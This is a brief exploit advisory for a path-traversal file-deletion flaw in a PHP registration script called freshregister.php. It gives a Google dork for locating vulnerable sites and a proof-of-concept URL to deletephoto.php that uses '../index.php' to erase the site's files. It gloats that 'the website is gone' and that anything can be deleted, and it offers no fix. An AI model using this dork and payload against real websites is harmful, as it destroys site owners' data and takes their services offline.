##############################################################################
# Title: freshregister.php remote file deleting
# vendor: n/a
# Exploit Author : Guardiran Security Team
# Tested On : ubuntu / Windows 8.1
#
# Dork: inurl:freshregister.php
#
# -----------------------------------------------
#
#
# Description :
# an authenticated user profile pic remover can delete the whole website and config files
#
#
#
# Poc:
# http://sitedomain.com/deletephoto.php?Choice=1&op=../index.php
# and the website is gone :)))
#
#
#
#
# you can delete what ever you want such as pics or files :))
#
#
#
#
#
#
##############################################################################